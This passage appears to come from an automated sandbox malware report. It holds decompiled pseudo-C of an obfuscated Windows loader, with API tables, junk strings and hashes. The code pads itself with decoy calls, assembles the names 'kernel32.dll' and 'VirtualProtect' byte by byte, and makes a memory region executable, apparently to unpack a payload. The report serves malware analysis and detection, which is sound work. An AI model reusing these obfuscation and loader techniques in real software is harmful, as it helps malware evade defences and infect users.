				_v116 = _v116 - 0x1a3059ef;
				_v64 = _v64 + 0x74ab2ddc;
				_v48 = _v48 - 0x4ef53f20;
				_v132 = _v132 + 0x18b94c28;
				_v148 = _v148 + 0x1259ec2f;
				_v32 = _v32 + 0x631684bf;
				_v80 = _v80 + 0x69a6e271;
				_v120 = _v120 + 0x78bcde06;
				_v116 = _v116 + 0x2b81e20;
				_v32 = _v32 - 0x2ef859da;
				_v80 = _v80 - 0x77360994;
				_v144 = _v144 + 0x1f36cecb;
				_v132 = _v132 + 0x648c8e6c;
				_v72 = _v72 + 0x7c750c57;
				_v12 = _v12 + 0x79bbe8f9;
				_v68 = _v68 + 0xdd259f5;
				_v60 = _v60 - 0x431ba4d5;
				_v148 = _v148 - 0x51e22a00;
				_v148 = _v148 + 0x7a0974cc;
				_v116 = _v116 - 0x744ad64e;
				_v132 = _v132 - 0x10b97c95;
				_v96 = _v96 - 0x3491834a;
				_v28 = _v28 + 0x7d205dc5;
				_v84 = _v84 + 0x4a01090a;
				_v8 = _v8 + 0x72a947b2;
				_v116 = _v116 + 0x3ebf96b5;
				_v112 = _v112 + 0x61b13e54;
				_v8 = _v8 - 0x2b39743e;
				_v8 = _v8 + 0xcc4c43a;
				_v104 = _v104 + 0x4d13fa81;
				_v48 = _v48 - 0x2512892e;
				_v44 = _v44 - 0x7a567ba1;
				_v100 = _v100 - 0x524f2c05;
				_v132 = _v132 - 0x17079e47;
				_v8 = _v8 + 0x24bd9487;
				_v8 = _v8 + 0x73df155c;
				_v28 = _v28 + 0x7296efd5;
				_v120 = _v120 + 0x4b7b7bc3;
				_v56 = _v56 - 0x487ea33c;
				_v112 = _v112 - 0x3f874266;
				_v68 = _v68 - 0x73e0e833;
				_v120 = _v120 + 0x2e7154;
				_v100 = _v100 + 0x59b53177;
				_v120 = _v120 + 0x30eefb10;
				_v92 = _v92 + 0x5e3cc7c5;
				_v100 = _v100 - 0x79589b6b;
				_v148 = _v148 + 0x301cf8f0;
				_v68 = _v68 + 0x36a7d5e;
				_v20 = _v20 + 0x27a2f31c;
				_v36 = _v36 - 0x9702847;
				_v40 = _v40 - 0x29a7359;
				_v68 = _v68 + 0x5954e8ce;
				_v124 = _v124 + 0x601918f0;
				_v32 = _v32 + 0xc56aa40;
				_v16 = _v16 - 0x5e90bc47;
				_v32 = _v32 - 0x1cb5b284;
				_v44 = _v44 - 0x7bbadab0;
				_v84 = _v84 - 0x260c0b1b;
				_v80 = _v80 + 0x36908767;
				_v28 = _v28 + 0x1b250939;
				_v80 = _v80 + 0x3832ce3;
				_v48 = _v48 - 0x25eb7f4a;
				_v108 = _v108 + 0x2a41da93;
				_v80 = _v80 - 0x48267bff;
				_v116 = _v116 - 0x2561c46c;
				_v96 = _v96 - 0x79669f;
				_v68 = _v68 + 0x61d5865a;
				_v68 = _v68 + 0x5f533b42;
				_v28 = _v28 + 0x45d0fbec;
				_v132 = _v132 + 0x55a598a5;
				_v68 = _v68 + 0x5b2091e1;
				_v24 = _v24 + 0x4e798867;
				_v12 = _v12 + 0x46c6a7c6;
				_v96 = _v96 + 0x4fa1af8f;
				_v20 = _v20 + 0x6fca9ab;
				_v120 = _v120 - 0x2fafde2;
				_v32 = _v32 - 0x6dbd37fe;
				_v52 = _v52 - 0x6060e804;
				_v116 = _v116 + 0x3760726d;
				_v136 = _v136 + 0x19c43911;
				_v144 = _v144 + 0x693c1593;
				_v76 = _v76 - 0x177528af;
				_v96 = _v96 + 0x7b34a37e;
				_v120 = _v120 - 0x60a8713;
				_v88 = _v88 + 0x67a1bbd7;
				_v128 = _v128 + 0x6a00423d;
				_v28 = _v28 + 0x4f82f0b7;
				_t404 =  *0x4d4524 - 0x26;
				if( *0x4d4524 == 0x26) {
					E00404ACE(0, 0, 0);
					_push(0);
					_push(0);
					E00404A33(0, 0);
					E00404972(0);
					_push(0);
					E004049A2();
					E00404972(0);
					E0040485B(_t393, _t395, __edi, 0);
					_push(0);
					E00404850();
					E00404770(_t393, __edi, 0);
					_push(0);
					E00404693(_t393, __edi, 0, _t404);
					E00404653(_t394, 0, 0);
					_push(0);
					_push(0);
					E00404438(_t393, __edi, 0, _t404);
					E00404404(0);
					_push(0);
					E00404388(_t393, _t395, __edi, 0, _t404);
					_push(0);
					_push(0);
					_push(0);
					E0040428C(_t393, _t395, __edi, 0, _t404);
					E00404079(_t395, 0, 0, 0, 0, 0);
					E004041E5(0, 0, 0, 0);
					E0040405C(0, 0, 0, 0);
				}
				_t350 =  *0x41221c; // 0x8d88a
				_push(_t396);
				 *0x4d4524 = _t350;
				_t397 = 0;
				L3:
				L3:
				if(_t397 < 0x1c86b) {
					GetTickCount();
					GetCharABCWidthsA(0, 0, 0, 0);
				}
				if(_t397 <= 0x1e9d5c97 || _v8 == 0xace7c8 || _v180 == 0xad642ec) {
					goto L8;
				}
				L9:
				_t398 = 0x79a863;
				do {
					if( *0x4d4524 == 0x15) {
						SetFilePointer(0, 0,  &_v152, 0);
						HeapWalk(0, 0);
						SetMailslotInfo(0, 0);
						GetProcessPriorityBoost(0, 0);
					}
					_t398 = _t398 - 1;
				} while (_t398 != 0);
				_t358 =  *0x412008; // 0x40e952
				 *0x4d60a8 = _t358;
				if( *0x4d4524 == 0x81) {
					GlobalFindAtomA("puvatagagenaziga");
					LoadLibraryA("gahemehucolerayuwuyipedakem");
					__imp__QueryMemoryResourceNotification(0,  &_v152);
					ClearCommBreak(0);
					EnumResourceLanguagesW(0, 0, 0, 0, 0);
					_hread(0,  &_v1216, 0);
					VirtualAlloc(0, 0, 0, 0);
					__imp__SetVolumeMountPointW(L"lasisis", L"birezefovunusahupu fekonicuke");
					SetConsoleTitleW(L"zoxudecebomafasolo malehuzobudepolakareculopo kipehibaku tamivonogo");
					FreeEnvironmentStringsW(0);
					SetThreadPriority(0, 0);
					AddAtomA("bugepicokipuwu jamexeyofopilafavusilawifezenago cekukakerozekelamoxewikofefina becup");
					MoveFileW(0, 0);
					GenerateConsoleCtrlEvent(0, 0);
					__imp__GetCurrentActCtx(0);
					GetModuleHandleW(0); // executed
				}
				E00403341(_t394); // executed
				return 0;
				L8:
				_t397 = _t397 + 1;
				if(_t397 < 0x8e2a3b3f) {
					goto L3;
				}
				goto L9;
			}

0x00403607
0x00403611
0x00403618
0x0040361f
0x00403626
0x0040362d
0x00403634
0x0040363b
0x00403642
0x00403649
0x00403650
0x00403657
0x0040365e
0x00403665
0x0040366f
0x00403676
0x0040367d
0x00403684
0x0040368b
0x00403695
0x0040369c
0x004036a3
0x004036aa
0x004036b1
0x004036bb
0x004036c2
0x004036c9
0x004036d0
0x004036d7
0x004036de
0x004036e5
0x004036ec
0x004036f3
0x004036fa
0x00403701
0x00403708
0x00403712
0x00403719
0x00403720
0x00403727
0x0040372e
0x00403735
0x0040373c
0x00403743
0x0040374a
0x00403751
0x00403758
0x0040375f
0x00403766
0x0040376d
0x00403774
0x0040377b
0x00403782
0x00403789
0x00403790
0x00403797
0x0040379e
0x004037a5
0x004037ac
0x004037b3
0x004037ba
0x004037c1
0x004037c8
0x004037cf
0x004037d6
0x004037dd
0x004037e4
0x004037eb
0x004037f2
0x004037f9
0x00403800
0x00403807
0x0040380e
0x00403815
0x0040381c
0x00403823
0x0040382a
0x00403831
0x00403838
0x00403842
0x00403849
0x00403850
0x00403857
0x0040385e
0x00403865
0x0040386c
0x00403873
0x0040387a
0x00403881
0x0040388b
0x00403892
0x0040389c
0x004038a3
0x004038aa
0x004038b1
0x004038b8
0x004038bf
0x004038c6
0x004038cd
0x004038d4
0x004038db
0x004038e2
0x004038e9
0x004038f0
0x004038f7
0x004038fe
0x00403905
0x0040390c
0x00403913
0x0040391d
0x00403924
0x0040392b
0x00403932
0x00403939
0x00403940
0x00403947
0x00403951
0x00403958
0x0040395f
0x00403966
0x0040396d
0x00403974
0x0040397e
0x00403988
0x0040398f
0x00403996
0x0040399d
0x004039a4
0x004039ab
0x004039b2
0x004039b9
0x004039c0
0x004039c7
0x004039ce
0x004039d5
0x004039dc
0x004039e3
0x004039ea
0x004039f1
0x004039f8
0x004039ff
0x00403a06
0x00403a0d
0x00403a14
0x00403a1b
0x00403a22
0x00403a29
0x00403a30
0x00403a37
0x00403a3e
0x00403a45
0x00403a4f
0x00403a56
0x00403a5d
0x00403a64
0x00403a6b
0x00403a72
0x00403a79
0x00403a80
0x00403a87
0x00403a8e
0x00403a95
0x00403a9c
0x00403aa3
0x00403aaa
0x00403ab1
0x00403ab8
0x00403abf
0x00403ac6
0x00403acd
0x00403ad4
0x00403adb
0x00403ae2
0x00403ae9
0x00403af0
0x00403af7
0x00403afe
0x00403b05
0x00403b0c
0x00403b13
0x00403b1a
0x00403b21
0x00403b28
0x00403b2f
0x00403b39
0x00403b43
0x00403b4a
0x00403b51
0x00403b58
0x00403b5f
0x00403b66
0x00403b6f
0x00403b76
0x00403b7b
0x00403b80
0x00403b81
0x00403b84
0x00403b8a
0x00403b8f
0x00403b90
0x00403b96
0x00403b9b
0x00403ba0
0x00403ba1
0x00403ba7
0x00403bac
0x00403bad
0x00403bb4
0x00403bb9
0x00403bba
0x00403bbb
0x00403bc4
0x00403bc9
0x00403bca
0x00403bcf
0x00403bd0
0x00403bd1
0x00403bd2
0x00403bdc
0x00403be5
0x00403bee
0x00403bf3
0x00403bf6
0x00403bfb
0x00403bfc
0x00403c01
0x00000000
0x00403c03
0x00403c09
0x00403c0b
0x00403c15
0x00403c15
0x00403c21
0x00000000
0x00000000
0x00403c41
0x00403c41
0x00403c46
0x00403c4d
0x00403c59
0x00403c61
0x00403c69
0x00403c71
0x00403c71
0x00403c77
0x00403c77
0x00403c84
0x00403c89
0x00403c8f
0x00403c9a
0x00403ca5
0x00403cb3
0x00403cba
0x00403cc5
0x00403cd4
0x00403cde
0x00403cee
0x00403cf9
0x00403d00
0x00403d08
0x00403d13
0x00403d1b
0x00403d23
0x00403d2a
0x00403d31
0x00403d31
0x00403d37
0x00403d40
0x00403c38
0x00403c38
0x00403c3f
0x00000000
0x00000000
0x00000000

APIs

__vswprintf.LIBCMT ref: 00403B7B

Part of subcall function 00404ACE: __vsprintf_l.LIBCMT ref: 00404ADE

_wscanf.LIBCMT ref: 00403B84

Part of subcall function 00404A33: _vscanf.LIBCMT ref: 00404A46

Part of subcall function 00404972: DeleteFileA.KERNEL32(00000000,?,00403B8F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040497A
Part of subcall function 00404972: GetLastError.KERNEL32(?,00403B8F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404984
Part of subcall function 00404972: __dosmaperr.LIBCMT ref: 00404993

Part of subcall function 0040485B: __NMSG_WRITE.LIBCMT ref: 0040487C
Part of subcall function 0040485B: _raise.LIBCMT ref: 0040488D
Part of subcall function 0040485B: _memset.LIBCMT ref: 00404925
Part of subcall function 0040485B: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00404957
Part of subcall function 0040485B: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00404964

_malloc.LIBCMT ref: 00403BA7

Part of subcall function 00404770: __FF_MSGBANNER.LIBCMT ref: 00404793
Part of subcall function 00404770: __NMSG_WRITE.LIBCMT ref: 0040479A
Part of subcall function 00404770: RtlAllocateHeap.NTDLL(00000000,00404A56,00000001,00000000,00000000,?,0040AFE0,00404A65,00000001,00404A65,?,00406A93,00000018,00410880,0000000C,00406B24), ref: 004047E7

Part of subcall function 00404693: __lock.LIBCMT ref: 004046B1
Part of subcall function 00404693: ___sbh_find_block.LIBCMT ref: 004046BC
Part of subcall function 00404693: ___sbh_free_block.LIBCMT ref: 004046CB
Part of subcall function 00404693: HeapFree.KERNEL32(00000000,00404A65,004106E0,0000000C,00406AEA,00000000,00410880,0000000C,00406B24,00404A65,5E90BC38,eJ@,00407A16,00000004,004108A0,0000000C), ref: 004046FB
Part of subcall function 00404693: GetLastError.KERNEL32(?,00405922,00000001,00000214,?,00000000,00405EA2,00404A65,?,00000000,00000000,?,00403B80,00000000,00000000,00000000), ref: 0040470C

_calloc.LIBCMT ref: 00403BB4

Part of subcall function 00404653: __calloc_impl.LIBCMT ref: 00404668

_realloc.LIBCMT ref: 00403BBB

Part of subcall function 00404438: _malloc.LIBCMT ref: 0040444E

_ferror.LIBCMT ref: 00403BC4
_fseek.LIBCMT ref: 00403BD2
__wctomb_s_l.LIBCMT ref: 00403BDC
__cftof.LIBCMT ref: 00403BE5

Part of subcall function 004041E5: __wctomb_s_l.LIBCMT ref: 004041F8

__wcstoi64_l.LIBCMT ref: 00403BEE

Part of subcall function 0040405C: strtoxl.LIBCMT ref: 0040406F

GetTickCount.KERNEL32 ref: 00403C0B
GetCharABCWidthsA.GDI32(00000000,00000000,00000000,00000000), ref: 00403C15
SetFilePointer.KERNEL32(00000000,00000000,?,00000000), ref: 00403C59
HeapWalk.KERNEL32(00000000,00000000), ref: 00403C61
SetMailslotInfo.KERNEL32 ref: 00403C69
GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 00403C71
GlobalFindAtomA.KERNEL32(puvatagagenaziga), ref: 00403C9A
LoadLibraryA.KERNEL32(gahemehucolerayuwuyipedakem), ref: 00403CA5
QueryMemoryResourceNotification.KERNEL32(00000000,?), ref: 00403CB3
ClearCommBreak.KERNEL32(00000000), ref: 00403CBA
EnumResourceLanguagesW.KERNEL32 ref: 00403CC5
_hread.KERNEL32(00000000,?,00000000), ref: 00403CD4
VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403CDE
SetVolumeMountPointW.KERNEL32(lasisis,birezefovunusahupu fekonicuke), ref: 00403CEE
SetConsoleTitleW.KERNEL32(zoxudecebomafasolo malehuzobudepolakareculopo kipehibaku tamivonogo), ref: 00403CF9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00403D00
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00403D08
AddAtomA.KERNEL32 ref: 00403D13
MoveFileW.KERNEL32(00000000,00000000), ref: 00403D1B
GenerateConsoleCtrlEvent.KERNEL32(00000000,00000000), ref: 00403D23
GetCurrentActCtx.KERNEL32(00000000), ref: 00403D2A
GetModuleHandleW.KERNEL32(00000000), ref: 00403D31

Strings

birezefovunusahupu fekonicuke, xrefs: 00403CE4
8d._, xrefs: 00403797
qQUQ, xrefs: 00403701
#aN, xrefs: 004036BB
gahemehucolerayuwuyipedakem, xrefs: 00403CA0
#m2d, xrefs: 004036D7
\@]K, xrefs: 004038F0
zoxudecebomafasolo malehuzobudepolakareculopo kipehibaku tamivonogo, xrefs: 00403CF4
=B, xrefs: 00403B5F
puvatagagenaziga, xrefs: 00403C95
F5(O, xrefs: 00403665
bugepicokipuwu jamexeyofopilafavusilawifezenago cekukakerozekelamoxewikofefina becup, xrefs: 00403D0E
>t9+, xrefs: 004039C0
mr`7, xrefs: 00403B28
R@, xrefs: 00403C89
B;S_, xrefs: 00403ADB
"wcL, xrefs: 00403758
lasisis, xrefs: 00403CE9
Tq., xrefs: 00403A22
R@, xrefs: 00403C84
G(p, xrefs: 00403A5D

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: FileHeap$AtomConsoleErrorExceptionFilterFreeLastPriorityResourceUnhandled__wctomb_s_l_malloc$AllocAllocateBoostBreakCharClearCommCountCtrlCurrentDeleteEnumEnvironmentEventFindGenerateGlobalHandleInfoLanguagesLibraryLoadMailslotMemoryModuleMountMoveNotificationPointPointerProcessQueryStringsThreadTickTitleVirtualVolumeWalkWidths___sbh_find_block___sbh_free_block__calloc_impl__cftof__dosmaperr__lock__vsprintf_l__vswprintf__wcstoi64_l_calloc_ferror_fseek_hread_memset_raise_realloc_vscanf_wscanfstrtoxl
String ID: "wcL$#m2d$#aN$8d._$=B$>t9+$B;S_$F5(O$G(p$R@$R@$Tq.$\@]K$birezefovunusahupu fekonicuke$bugepicokipuwu jamexeyofopilafavusilawifezenago cekukakerozekelamoxewikofefina becup$gahemehucolerayuwuyipedakem$lasisis$mr`7$puvatagagenaziga$qQUQ$zoxudecebomafasolo malehuzobudepolakareculopo kipehibaku tamivonogo
API String ID: 3404579332-3038612470
Opcode ID: 67aece06b0a823fd5bba326c417ff287551b6fa6a5c51e50792e3c80cadc20c1
Instruction ID: ee9f2f4cd7d0249cf3476cdfa90ed1a2981bd44c685c964c565d5fe5899f360e
Opcode Fuzzy Hash: 67aece06b0a823fd5bba326c417ff287551b6fa6a5c51e50792e3c80cadc20c1
Instruction Fuzzy Hash: B70226B2C01328EBCB509FE2D9496DEBB74FF21364F25815DE21536515E7380A82CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403341 Relevance: 68.5, APIs: 32, Strings: 7, Instructions: 224
pipefilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00403341(void* __ecx) {
				void* _v6;
				long _v8;
				long _v12;
				void* _v14;
				long _v16;
				long _v20;
				long _v24;
				CHAR* _v28;
				struct _CHAR_INFO _v32;
				struct _SMALL_RECT _v40;
				struct _OSVERSIONINFOEXA _v196;
				char _v1220;
				char _v2244;
				short _v3268;
				char _v3812;
				char _v4292;
				short _v6340;
				int _t50;
				void* _t86;
				void* _t87;
				void* _t88;
				CHAR* _t91;
				intOrPtr _t92;
				void* _t93;
				void* _t94;

				_t86 = __ecx;
				E00403D50(0x18c0);
				_t91 = 0;
				do {
					if(_t91 == 0xc18) {
						 *0x4d4524 =  *0x4d4524 + 0x38d6;
					}
					if( *0x4d4524 == 0x1394) {
						GetModuleHandleW(L"coxudofuxakijudahulazafitawa lodiwejituhe vezocilagomehefisuc teyazohimod");
					}
					_t91 = _t91 + 1;
				} while (_t91 < 0x319c8e);
				E0040332D();
				_t92 = 0;
				if( *0x4d4524 > 0) {
					do {
						E0040303E(_t92);
						if( *0x4d4524 == 0x1af) {
							GetNamedPipeHandleStateW(0,  &_v12,  &_v20,  &_v16,  &_v8,  &_v3268, 0);
							InterlockedExchange(0, 0);
						}
						_t92 = _t92 + 1;
					} while (_t92 <  *0x4d4524);
				}
				_t93 = 0x91973f;
				do {
					if( *0x4d4524 == 0x465) {
						__imp__GetConsoleAliasExesLengthW();
						EnumCalendarInfoW(0, 0, 0, 0);
						InterlockedCompareExchange( &_v12, 0, 0);
						GetConsoleTitleA( &_v4292, 0);
						GetLogicalDriveStringsW(0,  &_v6340);
						FlushFileBuffers(0);
						GetShortPathNameA("xehil wuwamolerexe sokaloliyekacovenumihafelas bexutes godudahavafewavivilijunihikop",  &_v1220, 0);
						__imp__GetComputerNameExA(0,  &_v2244,  &_v20);
						CopyFileW(0, 0, 0);
					}
					_t93 = _t93 - 1;
				} while (_t93 != 0);
				do {
					if( *0x4d4524 == 0x92) {
						CloseHandle(0);
					}
					if(_t93 == 0xa9a9) {
						 *0x4d4520 = LoadLibraryA("VirtualProtect");
					}
					_t93 = _t93 + 1;
				} while (_t93 < 0x25563);
				"VirtualProtect" = 0;
				_t94 = 0;
				do {
					if(_t94 == 0x148) {
						E0040322F(_t86); // executed
					}
					_t94 = _t94 + 1;
				} while (_t94 < 0x427fa7);
				_t50 = E00402F91( *0x4c6de0,  *0x4d4524, 0x412010);
				_t87 = 0;
				do {
					if( *0x4d4524 == 0x10) {
						InterlockedIncrement( &_v12);
						_t50 = GetCharWidthA(0, 0, 0, 0);
					}
					if(_t87 == 0x1e674) {
						_t50 = E00403221(_t50);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 0x3e4e2);
				_t88 = 0xdd7b3;
				do {
					if( *0x4d4524 == 0x21) {
						CreateNamedPipeW(0, 0, 0, 0, 0, 0, 0, 0);
						__imp__WinHttpSetOption(0, 0, 0, 0);
					}
					_t88 = _t88 - 1;
				} while (_t88 != 0);
				E00402DC0();
				if( *0x4d4524 == 0x58c) {
					GlobalFlags(0);
					__imp__FindFirstVolumeA( &_v2244, 0);
					__imp__CreateJobObjectA(0, "rumanekek");
					GetModuleHandleW(L"robuf");
					FindResourceA(0, "xocaliveyekonivagasesehagir", "laminugazedo xaricixudamiparusotupegelur gitinopikuninitik vepuvilorudebofaxikafej fakufatacumeweyemotohirafipubo");
					GetHandleInformation(0,  &_v12);
					__imp__CancelTimerQueueTimer(0, 0);
					VerifyVersionInfoA( &_v196, 0, 0);
					InterlockedIncrement( &_v20);
					GetCommandLineA();
					SearchPathA(0, 0, 0, 0,  &_v1220,  &_v28);
					_v8 = 0;
					asm("stosw");
					_v16 = 0;
					asm("stosw");
					WriteConsoleOutputA(0,  &_v32, _v8, _v16,  &_v40);
					__imp__GetCPInfoExW(0, 0,  &_v3812, 0);
					GetBinaryTypeA(0,  &_v24);
				}
				L0040321B();
				return 0;
			}

0x00403341
0x00403349
0x00403353
0x00403355
0x0040335b
0x00403362
0x00403362
0x00403372
0x00403379
0x00403379
0x0040337f
0x00403380
0x00403388
0x0040338d
0x00403395
0x00403397
0x00403398
0x004033a7
0x004033c2
0x004033ca
0x004033ca
0x004033d0
0x004033d1
0x00403397
0x004033d9
0x004033de
0x004033e8
0x004033ea
0x004033f4
0x00403400
0x0040340e
0x0040341c
0x00403423
0x00403436
0x00403448
0x00403451
0x00403451
0x00403457
0x00403457
0x0040345a
0x00403464
0x00403467
0x00403467
0x00403473
0x00403480
0x00403480
0x00403485
0x00403486
0x0040348e
0x00403494
0x00403496
0x0040349c
0x0040349e
0x0040349e
0x004034a3
0x004034a4
0x004034bd
0x004034c8
0x004034ca
0x004034d1
0x004034d7
0x004034dd
0x004034dd
0x004034e9
0x004034eb
0x004034eb
0x004034f0
0x004034f1
0x004034f9
0x004034fe
0x00403505
0x0040350f
0x00403519
0x00403519
0x0040351f
0x0040351f
0x00403522
0x00403531
0x00403538
0x00403546
0x00403552
0x0040355d
0x0040356e
0x00403579
0x00403581
0x00403591
0x0040359b
0x0040359d
0x004035b2
0x004035ba
0x004035c1
0x004035c3
0x004035ca
0x004035db
0x004035ea
0x004035f5
0x004035f5
0x004035fb
0x00403606

APIs

GetModuleHandleW.KERNEL32(coxudofuxakijudahulazafitawa lodiwejituhe vezocilagomehefisuc teyazohimod), ref: 00403379
GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004033C2
InterlockedExchange.KERNEL32(00000000,00000000), ref: 004033CA
GetConsoleAliasExesLengthW.KERNEL32 ref: 004033EA
EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004033F4
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00403400
GetConsoleTitleA.KERNEL32(?,00000000), ref: 0040340E
GetLogicalDriveStringsW.KERNEL32(00000000,?), ref: 0040341C
FlushFileBuffers.KERNEL32(00000000), ref: 00403423
GetShortPathNameA.KERNEL32 ref: 00403436
GetComputerNameExA.KERNEL32(00000000,?,?), ref: 00403448
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00403451
CloseHandle.KERNEL32(00000000), ref: 00403467
LoadLibraryA.KERNEL32(VirtualProtect), ref: 0040347A
InterlockedIncrement.KERNEL32(?), ref: 004034D7
GetCharWidthA.GDI32(00000000,00000000,00000000,00000000), ref: 004034DD
CreateNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040350F
WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000), ref: 00403519
GlobalFlags.KERNEL32(00000000), ref: 00403538
FindFirstVolumeA.KERNEL32(?,00000000), ref: 00403546
CreateJobObjectA.KERNEL32(00000000,rumanekek), ref: 00403552
GetModuleHandleW.KERNEL32(robuf), ref: 0040355D
FindResourceA.KERNEL32(00000000,xocaliveyekonivagasesehagir,laminugazedo xaricixudamiparusotupegelur gitinopikuninitik vepuvilorudebofaxikafej fakufatacumeweyemotohirafipubo), ref: 0040356E
GetHandleInformation.KERNEL32(00000000,?), ref: 00403579
CancelTimerQueueTimer.KERNEL32(00000000,00000000), ref: 00403581
VerifyVersionInfoA.KERNEL32(?,00000000,00000000,00000000), ref: 00403591
InterlockedIncrement.KERNEL32(?), ref: 0040359B
GetCommandLineA.KERNEL32 ref: 0040359D
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004035B2
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 004035DB
GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 004035EA
GetBinaryTypeA.KERNEL32(00000000,?), ref: 004035F5

Strings

rumanekek, xrefs: 0040354C
xocaliveyekonivagasesehagir, xrefs: 00403568
xehil wuwamolerexe sokaloliyekacovenumihafelas bexutes godudahavafewavivilijunihikop, xrefs: 00403431
laminugazedo xaricixudamiparusotupegelur gitinopikuninitik vepuvilorudebofaxikafej fakufatacumeweyemotohirafipubo, xrefs: 00403563
coxudofuxakijudahulazafitawa lodiwejituhe vezocilagomehefisuc teyazohimod, xrefs: 00403374
robuf, xrefs: 00403558
VirtualProtect, xrefs: 00403475, 0040348E

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: Handle$Interlocked$ConsoleInfo$CreateExchangeFileFindIncrementModuleNameNamedPathPipeTimer$AliasBinaryBuffersCalendarCancelCharCloseCommandCompareComputerCopyDriveEnumExesFirstFlagsFlushGlobalHttpInformationLengthLibraryLineLoadLogicalObjectOptionOutputQueueResourceSearchShortStateStringsTitleTypeVerifyVersionVolumeWidthWrite
String ID: VirtualProtect$coxudofuxakijudahulazafitawa lodiwejituhe vezocilagomehefisuc teyazohimod$laminugazedo xaricixudamiparusotupegelur gitinopikuninitik vepuvilorudebofaxikafej fakufatacumeweyemotohirafipubo$robuf$rumanekek$xehil wuwamolerexe sokaloliyekacovenumihafelas bexutes godudahavafewavivilijunihikop$xocaliveyekonivagasesehagir
API String ID: 3467683910-464296369
Opcode ID: 7680c05b61bde41368a0ebafe12c32aca778f54769d267ed735a1ceb2dc78301
Instruction ID: b81a085a6f80ca7df3f6ec10b54690260dbe2195b1201817ca2f9184d4b94b06
Opcode Fuzzy Hash: 7680c05b61bde41368a0ebafe12c32aca778f54769d267ed735a1ceb2dc78301
Instruction Fuzzy Hash: 6E713372901158BFDB01AFA0DEC8DEF7BACEB49346B004477F646F2461D6385E848B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040322F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040322F(void* __ecx) {
				long _v8;
				struct HINSTANCE__* _t2;
				int _t4;
				CHAR* _t8;

				_t8 = "VirtualProtect";
				"lProtect" = 0x33;
				"Protect" = 0x32;
				 *0x4a43b3 = 0x6c;
				 *0x4a43b2 = 0x6c;
				M004A43AB = 0x6e;
				M004A43AD = 0x6c;
				"VirtualProtect" = 0x6b;
				M004A43AC = 0x65;
				M004A43AA = 0x72;
				"rotect" = 0x2e;
				 *0x4a43b1 = 0x64;
				M004A43A9 = 0x65;
				 *0x4a43b4 = 0;
				_t2 = LoadLibraryA(_t8);
				 *0x4d4520 = _t2;
				 *0x4a43b3 = 0x65;
				M004A43A9 = 0x69;
				M004A43AC = 0x75;
				"lProtect" = 0x6c;
				M004A43AD = 0x61;
				 *0x4a43b1 = 0x6f;
				 *0x4a43b5 = 0x74;
				"VirtualProtect" = 0x56;
				 *0x4a43b4 = 0x63;
				"Protect" = 0x50;
				 *0x4a43b6 = 0;
				M004A43AB = 0x74;
				 *0x4a43b2 = 0x74;
				M004A43AA = 0x72;
				"rotect" = 0x72;
				"`ghvVirtualProtect" = GetProcAddress(_t2, _t8);
				_t4 = VirtualProtect( *0x4c6de0,  *0x4d4524, 0x40,  &_v8); // executed
				return _t4;
			}

0x00403234
0x0040323a
0x00403241
0x00403248
0x0040324f
0x00403256
0x0040325d
0x00403264
0x0040326b
0x00403272
0x00403279
0x00403280
0x00403287
0x0040328e
0x00403295
0x0040329d
0x004032a2
0x004032a9
0x004032b0
0x004032b7
0x004032be
0x004032c5
0x004032cc
0x004032d3
0x004032da
0x004032e1
0x004032e8
0x004032ef
0x004032f6
0x004032fd
0x00403304
0x0040331d
0x00403328
0x0040332c

APIs

